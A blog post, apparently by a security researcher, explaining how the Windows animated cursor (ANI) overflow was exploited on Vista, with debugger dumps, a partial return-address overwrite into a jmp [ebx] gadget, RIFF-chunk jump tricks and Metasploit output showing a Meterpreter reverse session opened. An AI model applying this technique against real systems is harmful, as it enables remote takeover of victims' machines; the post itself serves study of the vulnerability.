Skip to main content

Animated Cursor Vulnerability Demystified

With GS, DEP, ASLR, and protected mode IE7, it's possible to go ahead and write a functional proof of concept that will work on Vista and Xp also. When triggering the vulnerability on Vista with a complete overwrite of the return address, the register state looks something like this:

eax=5f36476f ebx=0329f278 ecx=00000000 edx=00000000 esi=0329f1f0 edi=0329f1bc
eip=41414141 esp=0329f1bc ebp=66ae6c41 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
41414141 ?? ???

One important point to note is that our malicious ani file contain two ani header one is good i.e of 36 byte and other is the bad boy that cause buffer overflow in LoadAniIcon function.The first is of 36 byte to make sure it passes the loadCursorIconfromFilemap function which checks the header of ani,but the problem is that it is called only once for a single file,if another ani header is encountered then instead of calling loadCursorIconfromFilemap loadAniIcon function  will be called.And that gives us chance to hide our malicious code and do the buffer overflow by crafting another ani header in same ani file.




For XP targets, the Metasploit exploit attempts to call through [ebx+4]. The ebx register on Vista has a similar structure, where [ebx] and [ebx+4] point into the RIFF image:


0:006> db poi(ebx) L20
027d0000 52 49 46 46 eb 0e 02 00-41 43 4f 4e 4d 53 55 58 RIFF....ACONMSUX
027d0010 6e 00 00 00 e9 db 0e 02-00 64 18 d0 ae 1d b1 c9 n........d......
0:006> db poi(ebx+4) L20
027e0fb4 53 51 66 63 37 ff 00 00-ba 7b 6d 5f 20 37 54 9b SQfc7....{m_ 7T.
027e0fc4 d0 76 1a 0c aa 25 6c 46-ae 06 ee 7f 11 22 67 5b .v...%lF....."g[


There are also other contextual references that contain parts of, or point into, the RIFF image. The esp and edi registers contain the first ANI header found in the file. The esi register points to an ANIH chunk. For the purpose of this post, only the references found through the ebx register will be considered, though I did investigate these additional avenues to some degree. In Metasploit's existing ANI exploit, you'll see that HD has provided a target for Windows XP that uses a partial overwrite to point the return address at a location that contains a call [ebx+4] instruction. However, there are no immediately equivalent call [ebx+4] instructions within the required 16 page block on Vista:


0:006> s 775b154c L?ef00 ff 53 04
0:006> s 775b154c L?ef00 ff 63 04


Even though there are no call [ebx+4] instructions, there are a few jmp [ebx] instructions:


0:006> s 775b154c L?ef00 ff 13
0:006> s 775b154c L?ef00 ff 23
775b700b ff 23 c3 5f 77 2c c3 5f-77 81 e3 ff 7f ff ff e9 .#._w,._w.......
775b7bab ff 23 d2 5f 77 2c d2 5f-77 90 90 90 90 90 6a 0c .#._w,._w.....j.
775b90c6 ff 23 c1 50 56 e8 15 00-00 00 8b 4d fc 5f 33 cd .#.PV......M._3.
775c008b ff 23 ce ba 9d 02 00 00-3b ca 0f 84 7a d0 ff ff .#......;...z...
0:006> u 775b700b L1
USER32!WinStationSendMessageW+0x5c7:
775b700b ff23 jmp dword ptr [ebx]


This means that if the two low order bytes of the return address are overwritten with 0x700b, the vulnerable function will transfer control into a jmp [ebx] upon return. The jmp [ebx] will start executing code starting with the beginning of the RIFF image itself. The first four bytes of the image is the RIFF chunk tag ("RIFF"). This disassembles to four nop-equivalent instructions shown below:


0:006> u poi(ebx) L4
03040000 52 push edx
03040001 49 dec ecx
03040002 46 inc esi
03040003 46 inc esi


While these four initial bytes won't cause problems, the four bytes that follow them might. The field that follows the four byte tag is a four byte size which represents the size of the chunk, excluding the header fields. This really isn't much of a problem, though. Since we control the RIFF image that is being generated, we inherently control its size. While we can't reasonbly use all four bytes (since this would require a large RIFF), we can definitely make use of at least the two low order bytes. Padding out the RIFF chunk makes it possible to explicitly control the low order bytes.

With this in mind, the next step is to figure out exactly which instruction the low order bytes of the size field should be set to. We're fairly limited here, but a two byte short jump seems like a good option. Due to the way that the RIFF chunk is set up, its contents will look something like this in memory:


0:006> dd /c 1 poi(ebx)
03040000 46464952 RIFF tag: "RIFF"
03040004 00010eeb RIFF length
03040008 4e4f4341 ACON chunk tag: "ACON"
0304000c 4372726b Embedded chunk tag: random
03040010 0000015e Embedded chunk length: random
03040014 010edbe9 Embedded chunk data: arbitrary
03040018 e8111500 ...


Using this basic layout, we can insert a special embedded chunk as the first entry after the ACON tag. The purpose of this embedded chunk will be to act as a target for the short jump used in the RIFF length field. As such, the embedded chunk should contain additional code to execute. While it's entirely possible to have the embedded chunk contain a payload itself, the Metasploit exploit instead places a long jump that transfers control to the first byte after the end of the RIFF chunk itself. This makes the exploit uniform with XP in terms of how it executes the payload.

I know I left out a lot of details, but let's put the whole thing together. First, you can perform a partial overwrite of the return address using 0x700b. When the vulnerable function returns, it will return into a jmp [ebx] instruction. This will transfer control into the start of the RIFF image, starting with the RIFF tag. The two low order bytes of the RIFF chunk size field can be set to 0x0eb which is a short jump +16. This short jump transfers control into the data portion of an embedded chunk. The data portion of this embedded chunk contains a relative jump of around eb 77 byte to the payload that has been appended after the containing RIFF chunk.


msf exploit(ani_loadimage_chunksize) > exploit
Started reverse handler
Using URL: http://10.4.4.1:8080/foo
Server started.
Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >
Transmitting intermediate stager for over-sized stage...(89 bytes)
Sending stage (2834 bytes)
Sleeping before handling stage...
Uploading DLL (73739 bytes)...
Upload completed.
Meterpreter session 1 opened (10.4.4.1:4444 -> 10.4.4.2:49310)

msf exploit(ani_loadimage_chunksize) > sessions -i 1
Starting interaction with 1...

meterpreter > sysinfo
Computer: Vishal-Mishra
OS : Windows Vista (Build 6000, ).meterpreter > 


It's definitely possible (and likely) that there are cleaner ways to go about this, but this at least illustrates one way of going about it. It's clear that a partial overwrite of the return address is one of the best solutions in this case. The only major point of contention in this approach centers around what to overwrite the low order two bytes with.

Comments

Post a Comment

Popular posts from this blog

Hacking Windows 10 UWP App: DLL Injection & common Vulnerabilities

I recently started working on  widows 10 Apps( Apps not Applications) security. Before diving deep in hacking terms lets try to understand what's new in Windows 10 UWP( Universal Platform) as compared to old Apps. Lets begin with how apps actually work on windows 10(desktop/tablet). Now windows 10 comes with a container only for running apps inside the isolated environment. By default, /APPCONTAINER(Linker Flag) is off. This option modifies an executable to indicate whether the app must be run in the appcontainer process-isolation environment. Specify /APPCONTAINER for an app that must run in the appcontainer environment—for example, a Windows Store app. (The option is set automatically in Visual Studio when you create a Windows Store app from a template.) For a desktop app, specify /APPCONTAINER:NO or just omit the option. The /APPCONTAINER option was introduced in Windows 8. Now there is no registry entry concept for these app in the System HIVE rather they install they own hiv
5 comments
Read more

Installing vmware-11.0 on Ubuntu 15.04 Using kernel Patch

curl http://pastie.org/pastes/9934018/download -o /tmp/vmnet-3.19.patch cd /usr/lib/vmware/modules/source tar -xf vmnet.tar patch -p0 -i /tmp/vmnet-3.19.patch tar -cf vmnet.tar vmnet-only rm -r *-only vmware-modconfig --console --install-all References: http://askubuntu.com/questions/605530/vmware-player-7-1-0-on-ubuntu-15-04-kernel-3-19-0-10-generic-app-loading http://askubuntu.com/questions/617704/failed-to-build-vmnet-for-kernel-3-19
1 comment
Read more

SSI Injection Attack

SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields. It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:  Code: < ! # = / . " - > and [a-zA-Z0-9] Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that th
5 comments
Read more